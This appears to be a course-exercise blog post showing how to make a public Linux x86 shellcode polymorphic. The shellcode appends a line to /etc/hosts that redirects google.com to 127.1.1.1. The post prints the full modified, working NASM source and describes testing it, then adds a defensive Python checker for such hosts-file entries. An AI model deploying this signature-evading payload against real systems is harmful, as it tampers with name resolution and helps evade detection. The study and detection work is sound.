6_2 - ADDING ENTRIES TO "/ETC/HOSTS" FILE
- The same concepts studied in 6_1 apply here.
2 - MODIFYING A SHELLCODE
- The original program to be modified in this exercise adds a new entry to the hosts file mapping google.com to 127.1.1.1:
http://shell-storm.org/shellcode/files/shellcode-893.php
- Let's look at three possible modifications:
a) Based on the fact that any number AND-ed with itself is unchanged, the junk instruction "and edx,edx" is introduced; it has no effect on the functionality of the program:
https://en.wikipedia.org/wiki/Truth_table#Logical_conjunction_.28AND.29
b) Instead of pushing the "/etc///hosts" string onto the stack, its three 4-byte chunks are written just below esp and esp is then lowered by 12 bytes, so that it ends up pointing at the string:
```nasm
mov dword [esp-4],0x7374736f  ; "osts"  (instead of push 0x7374736f)
mov dword [esp-8],0x682f2f2f  ; "///h"  (instead of push 0x682f2f2f)
mov dword [esp-12],0x6374652f ; "/etc"  (instead of push 0x6374652f)
sub esp,0xc                   ; esp now points at "/etc///hosts"
```
c) Finally, instead of loading values through push/pop, a "mov" into the low byte of the register is used. This is done for the write length (20) and for the close (6) and exit (1) syscall numbers:
```nasm
;push 20
;pop edx
mov dl,0x14 ; length (20) of the string to write is moved to dl
int 0x80    ; write(fd, string, 20)
;push 0x6
;pop eax
mov al,0x6  ; identifier (6) for close syscall is moved to al
int 0x80    ; close(fd)
;push 0x1
;pop eax
mov al,0x1  ; identifier (1) for exit syscall is moved to al
int 0x80    ; exit
```
- The resulting assembly program after applying these modifications, A6_2.nasm:
```nasm
global _start
section .text
_start:
and edx,edx       ; junk instruction with no effect on the program
xor ecx, ecx      ; ecx = 0
mul ecx           ; eax = edx = 0
mov al, 0x5       ; syscall 5: open
push ecx          ; null terminator for the path string
;push 0x7374736f  ; /etc///hosts (original pushes)
;push 0x682f2f2f
;push 0x6374652f
mov dword [esp-4],0x7374736f  ; "osts"  written below esp
mov dword [esp-8],0x682f2f2f  ; "///h"  instead of pushing
mov dword [esp-12],0x6374652f ; "/etc"
sub esp,0xc       ; esp now points at "/etc///hosts"
mov ebx, esp      ; ebx = path
mov cx, 0x401     ; flags = O_WRONLY | O_APPEND
int 0x80          ; open("/etc///hosts", O_WRONLY|O_APPEND)
xchg eax, ebx     ; ebx = file descriptor
push 0x4
pop eax           ; syscall 4: write
jmp short _load_data
_write:
pop ecx           ; ecx = address of the string pushed by call
;push 20
;pop edx
mov dl,0x14       ; length (20) of the string to write is moved to dl
int 0x80          ; write(fd, string, 20)
;push 0x6
;pop eax
mov al,0x6        ; identifier (6) for close syscall is moved to al
int 0x80          ; close(fd)
;push 0x1
;pop eax
mov al,0x1        ; identifier (1) for exit syscall is moved to al
int 0x80          ; exit
_load_data:
call _write       ; pushes the address of the string, then jumps to _write
google db "127.1.1.1 google.com"
```
3 - TESTING POLYMORPHISM
- Assembling and linking A6_2.nasm:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJGZRxZchooqWAaSvGEIR0CDAk971gU_RzFCdNUMbU6McbihSCNyRdIMbXtZCE0GGGMXxwNdC4_IkIu_1Bzfou4Z_h4NXkqD8OyLXke3J41LVrmEKOtPARpRwflIM-XQHfc21lMLaKVYrM/s1600/screenshot.2.jpg)
- Extracting the shellcode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRM-_GOpPKjp_LWPtdjLUkhv4fD7IF9CqyPAbMTr7HYJOJsVcPYYLeeRRiHLYJByudEWYXZCmIq5j792Jb0Hj3jZRRrkj69RSdVc6u9bMCgteGUaceqtvOyRaqRU4_IgvYHOUiJaMo6PGK/s1600/screenshot.11.jpg)
- Inserting the shellcode into the ShellcodeTest.c program:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlcvcKjLirjJ-HznH94sWlwNMBC-7UBuDvm9Dy6eGgHikQ42bA1B43D2U-EeF2LPOUbs_fwTY1hzrPYKK-JkJHr7vToIi7AIsGu30cpn7Ia4oK59Lqq2r3Cb7PIXI-wcjzfmtS9BvXN3cD/s1600/screenshot.5.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtdiuqw0faCUNnXqx2s48q1Rbguw4iE2nyxmnM6D_VffQHno_OjZobpjclHKnD287iQ236jSSfEiFimsRPway9eNpMKpIHjOJW1VLtLkEo2l9rYKiKIY2gZTboykIuzzLA_ZvDpjHdAKY-/s1600/screenshot.12.jpg)
- Compiling ShellcodeTest.c:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBco98TSuQJrKadtC5rLP4q7tKFdJs4eFVDOns1WzYX-o4Ry2A_595u1AImbqjX77Oekmoj0iDmIzDp_PNCO9QMm4zejDMZtaI5ZAGOMVKPCXw_bXPpzJvJA5cgKqv3cwjqwr7P6hwivnO/s1600/screenshot.13.jpg)
- Executing the compiled ShellcodeTest:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy5UywXzvzekzz4OKT2r1U921-MCJHl95KgZowUxkqu1rfcbM-SknUgAmS6vGLfH0rNRlFwrA3osPes1a5RvZ4BDMioiORbjYntGx5IoXWZcs9u71F5KFFuNzIUmwFC3u8-v-blcD65r9I/s1600/screenshot.14.jpg)
- The result is the same as with the original program: a new entry is added to the "/etc/hosts" file mapping google.com to 127.1.1.1:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6p5uEgFmRg79H5d5LmMv6Qb-crpzRDaofLUIk-oA6N4Px8OzIv_e5DCzhrghnPPUAsuSZ7cUKwT42Zmr_u_XeN3t7J1TLeU8xXpqc-Woi3yRhCPXc2xLqqFU6d_fUol-7ExkOp2I9ZZNW/s1600/screenshot.10.jpg)
- While the original shellcode was 77 bytes, the new one is 88 bytes, an increase of 14%.
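As an added, defender-side example that is not part of the original post: the visible effect of this shellcode is a line in /etc/hosts that pins a public domain to a loopback address. The Python script below (written for this page; SAMPLE_HOSTS, LOCAL_NAMES, parse_hosts and suspicious_entries are all constructed here, not from any tool) parses a hosts file and flags exactly that kind of entry, which is the simplest host-level check for this tampering.

```python
import ipaddress

# Constructed sample of an /etc/hosts file; the last line is the entry the
# shellcode described in this post appends.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
::1         localhost ip6-localhost ip6-loopback
192.168.1.10 fileserver.lan   # internal box
127.1.1.1 google.com
"""

# Names that legitimately map to a loopback address on most systems.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}


def parse_hosts(text):
    """Return (address, hostname) pairs; comments, blanks and bad lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                            # malformed address field
        entries.extend((addr, name.lower()) for name in fields[1:])
    return entries


def suspicious_entries(text, watched=frozenset(), local_names=LOCAL_NAMES):
    """Flag hosts entries that look like local DNS hijacking.

    Rule 1: a name outside local_names mapped to a loopback address.
    Rule 2: any name in `watched` (domains whose resolution must never be
            overridden locally, e.g. update servers) pinned to any address.
    """
    findings = []
    for addr, name in parse_hosts(text):
        reasons = []
        if name not in local_names and addr.is_loopback:
            reasons.append("non-local name mapped to loopback")
        if name in watched:
            reasons.append("watched domain pinned in hosts file")
        if reasons:
            findings.append((str(addr), name, reasons))
    return findings


if __name__ == "__main__":
    for addr, name, reasons in suspicious_entries(SAMPLE_HOSTS, watched={"google.com"}):
        print(f"{addr:<16} {name:<24} {'; '.join(reasons)}")
```

Run it against the real file with `open("/etc/hosts").read()` in place of SAMPLE_HOSTS; pair it with a file-integrity check (mtime or hash) so additions are caught at write time, not only on the next scan.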